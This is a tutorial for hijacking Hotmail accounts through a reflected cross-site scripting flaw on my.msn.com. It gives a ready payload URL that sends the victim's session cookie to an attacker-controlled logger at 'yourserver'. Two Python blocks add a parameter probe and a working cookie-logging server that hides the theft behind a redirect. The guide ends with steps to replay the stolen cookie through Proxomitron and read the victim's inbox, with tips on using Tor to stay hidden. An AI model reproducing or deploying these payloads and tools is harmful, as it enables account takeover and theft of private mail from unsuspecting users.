Hacking Hotmail through XSS
Introduction
Microsoft's code is not always secure, and this XSS exploit shows it once again.
It is not the first XSS hole found in Hotmail; earlier ones can attest to that.
How
The idea is simple. When you log in to Hotmail, a session cookie is set, and that
cookie is what grants you access on every page within its domain. Since the
cookie is not bound to your IP address (how is this possible, Microsoft?), anyone
holding a copy of it can present it from any machine. Once stolen, it can simply
be replayed to get into the account without logging in.
What this means is that we do not need the victim's password, or even their
email address. Through XSS we inject a piece of JavaScript that sends the cookie
to a web server running a logging script. That script can be written in PHP,
ASP, CGI, practically any language you want. The stolen cookie is then injected
into our own requests with Proxomitron.
Where
Finding an exploitable page is about 50% pure luck; otherwise you need an awful
amount of time. There is software that searches for XSS automatically. Don't use
it, it's crap; clear thinking is enough.
When searching, keep these points in mind:
1. The page you test must be in the domain the cookie is scoped to. The pages in
Hotmail with a 'Logout' button are using that cookie. I recommend adding a
bookmark that displays your cookie, like javascript:alert(document.cookie); .
2. You can use practically any browser, though I'd recommend Mozilla Firefox: it
is stable, secure and available on almost any OS. Opera or Internet Explorer are
fine too, if you like them better. One benefit of Opera is that it lets you
manage your own cookies.
3. If you want to be stealthy, use Tor or a proxy. Be aware, though, that DNS
leaks are still dangerous: a browser that resolves hostnames itself reveals which
sites you visit even when the HTTP traffic goes through the proxy.
In my search it took me 4 to 5 hours to find three exploits. I will discuss only
one.
After a short look at the cookie, I decided to just start searching. Apart from
your own security, no other preparation is needed. Focus on URLs with GET
variables; they are often vulnerable. And whenever you open a new page, check
that your cookie is still the same as the one from Hotmail's login page;
otherwise you are outside the cookie's scope and a hole there is useless.
Replace the GET variables in the URL one by one, reload the page and view the
page source. Also check the source for images or URLs that carry GET variables
of their own; you might be able to exploit those too. If your replaced value
appears in the source, shape it so that the result is still valid
HTML/JavaScript and shows you an error, such as an alert. Special characters are
often escaped, so test them all at once. A nice all-round test value is
something like hya"'><)(ho : the letters are easy to search for in the source,
and the characters between them tell you which ones come through unescaped.
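The search procedure above, as an added example that is not part of the original text: a small Python probe that swaps each GET variable for the hya"'><)(ho canary (keeping the other parameters so the page still loads), and a checker that does what the ctrl+f for hya does by hand, reporting which of the special characters came back unencoded. The two response snippets are constructed for the example; the second one shows what a properly escaping page would return.

```python
"""Reflection probe for GET parameters (added example, not the page's own code).
Mutates one query parameter at a time with the canary from the text, then
inspects a response body for which canary characters came back unencoded."""
from urllib.parse import parse_qsl, quote, urlencode, urlsplit, urlunsplit

CANARY = 'hya"\'><)(ho'        # the all-round test value from the text
PREFIX, SUFFIX = "hya", "ho"   # harmless markers that bracket the special characters
SPECIALS = CANARY[len(PREFIX):-len(SUFFIX)]   # the characters we want to see reflected


def inject_canary(url, param, canary=CANARY):
    """Return `url` with the value of `param` swapped for the canary.
    The other parameters (tok=, page=, ...) are kept so the page still loads.
    The canary is percent-encoded so the server receives the raw characters."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    mutated = [(k, canary if k == param else v) for k, v in pairs]
    return urlunsplit(parts._replace(query=urlencode(mutated, quote_via=quote)))


def probe_urls(url):
    """One test URL per GET parameter, to be fetched with the session cookie."""
    names = [k for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True)]
    return {name: inject_canary(url, name) for name in names}


def reflected_contexts(body, window=64):
    """Find each reflection of the canary in `body` and report which special
    characters survived unencoded at that spot (entity-encoded ones do not)."""
    hits, start = [], 0
    while True:
        i = body.find(PREFIX, start)
        if i < 0:
            break
        j = body.find(SUFFIX, i + len(PREFIX), i + len(PREFIX) + window)
        if j < 0:                    # prefix alone, e.g. the value was truncated
            start = i + len(PREFIX)
            continue
        between = body[i + len(PREFIX):j]
        hits.append({
            "offset": i,
            "reflected": body[i:j + len(SUFFIX)],
            "unescaped": [c for c in SPECIALS if c in between],
            "escaped": [c for c in SPECIALS if c not in between],
        })
        start = j + len(SUFFIX)
    return hits


def can_break_out_of_attribute(hit):
    """True when a double quote and both angle brackets survive, i.e. the
    reflected value can close a quoted attribute and open a new tag."""
    return all(c in hit["unescaped"] for c in '"<>')


# Constructed response snippets for the example (not captured from the site):
# the first reflects the full canary raw, the second is the escaped counterpart.
RAW_BODY = '<input type="hidden" name="m" value="hya"\'><)(ho" />'
ESCAPED_BODY = '<input type="hidden" name="m" value="hya&quot;&#39;&gt;&lt;)(ho" />'

if __name__ == "__main__":
    url = ("http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d"
           "&page=1&m=&col=1&tab=3")
    for name, test_url in probe_urls(url).items():
        print(name, test_url)
    for body in (RAW_BODY, ESCAPED_BODY):
        for hit in reflected_contexts(body):
            print(hit["reflected"], "unescaped:", "".join(hit["unescaped"]),
                  "breakout:", can_break_out_of_attribute(hit))
```

Fetching each probe URL still has to be done with the session cookie attached, as point 1 above says, and the response body handed to reflected_contexts; a hit where only the parentheses survive (as in the escaped snippet) is not exploitable from an attribute.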
Exploit
The normal URL:
http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1&m=&col=1&tab=3
The test URL:
http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1&m=hya"'><ho&col=1&tab=3
A ctrl+f in the source for hya found the value reflected into a hidden input,
breaking the markup:
<input type="hidden" name="m" value="hya"><ho" />
To alert the cookie, the markup needs to end up like this. Fortunately the
special characters were not escaped, so the payload can close the value
attribute and the input tag, insert a script, and then open a <br class=" so
that the server's trailing " /> closes it cleanly:
<input type="hidden" name="m" value="hya"><script>alert(document.cookie)</script><br class="ho" />
The exploited URL:
http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1&m=hya"><script>alert(document.cookie)</script><br class="ho&col=1&tab=3
Finish
I assume you have the knowledge to figure things out yourself, so I will not go
into much detail. In the examples above the cookie was alerted by JavaScript.
Instead we need the cookie sent to a web server, where it gets logged. I assume
you know how to write a logging script; replace my URL with that of your own
file where needed.
This is the edited URL, so that it sends the cookie to a web server. Note that
the + joining the two strings is written as %2B: a raw + in a query string is
decoded as a space, which would break the script.
http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1&m=hya"><script>location.href='http://yourserver/logger.php?cookie='%2Bescape(document.cookie)</script><br class="ho&col=1&tab=3
This is the link the victim has to click. As soon as he does, his cookie is sent
to your server and saved in your logfile. The logging script can then display
some innocent error or redirect to another page, so the victim notices nothing.
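The logging side and the encoding of the payload, as an added example that is not the page's own code: a Python stand-in for the logger.php the URL above points to (assumed to be served at http://yourserver/logger.py, with the logfile name and the redirect target being assumptions too). It builds the same attribute-breakout payload as above, percent-encodes it fully for the m= parameter (the page only encodes the +; encoding everything also keeps & and # from splitting or truncating the URL), decodes the escape()d cookie on the server, appends it to the logfile and bounces the victim to an innocent page. The cookie string in the usage and test is constructed, not a real Hotmail cookie.

```python
"""Cookie logger and payload encoder (added example, not the page's own code).
A Python replacement for the logger.php referred to in the text."""
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, quote, urlsplit

LOG_FILE = "cookies.log"              # assumption: logfile next to the script
INNOCENT_PAGE = "http://my.msn.com/"  # assumption: where the victim is bounced to


def build_payload(logger_url):
    """The breakout payload from the text: close the value attribute and the
    <input>, run the script, then open <br class=" so the server's trailing
    '" />' closes it cleanly."""
    js = "location.href='" + logger_url + "?cookie='+escape(document.cookie)"
    return 'hya"><script>' + js + '</script><br class="ho'


def encode_for_query(payload):
    """Percent-encode the payload for use as a GET value. Everything except
    letters, digits and -._~ is encoded, so '+' cannot turn into a space,
    '&' and '=' cannot split the parameter and '#' cannot truncate the URL."""
    return quote(payload, safe="")


def parse_logged_cookie(path):
    """Pull the cookie out of '/logger.py?cookie=...'. parse_qs undoes the %XX
    encoding that escape() applied in the browser."""
    return parse_qs(urlsplit(path).query).get("cookie", [""])[0]


def record_cookie(path, client_ip, write=None):
    """Log one request. Returns the written line, or None when the request
    carried no cookie (e.g. someone just browsing to the script)."""
    cookie = parse_logged_cookie(path)
    if not cookie:
        return None
    line = f"{client_ip}\t{cookie}\n"
    (write or _append_to_log)(line)
    return line


def _append_to_log(line):
    with open(LOG_FILE, "a") as f:
        f.write(line)


class LoggerHandler(BaseHTTPRequestHandler):
    """Logs the cookie, then redirects so the victim sees nothing unusual."""

    def do_GET(self):
        record_cookie(self.path, self.client_address[0])
        self.send_response(302)
        self.send_header("Location", INNOCENT_PAGE)
        self.end_headers()

    def log_message(self, *args):   # keep the console quiet
        pass


if __name__ == "__main__":
    # Value to put after m= in the exploit URL.
    print(encode_for_query(build_payload("http://yourserver/logger.py")))
    # Constructed example of what arrives after escape() in the browser.
    print(parse_logged_cookie("/logger.py?cookie=SESSION%3Dabc123%3B%20USER%3Dvictim"))
    HTTPServer(("0.0.0.0", 8080), LoggerHandler).serve_forever()
```

The logged line is the raw Cookie header value, exactly what goes into the Proxomitron header in the next step.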
Next, get Proxomitron and configure your browser to use it. Fire up Proxomitron,
go to the headers section and paste the cookie data from your logfile into a
fake Cookie header (there is one by default). Make sure the 'Out' box is
checked, so the header is added to your outgoing requests. Go to
http://my.msn.com/.
The inbox of your victim is all yours. If it does not work immediately, a cookie
has not been set yet. Just go to http://my.msn.com/ again.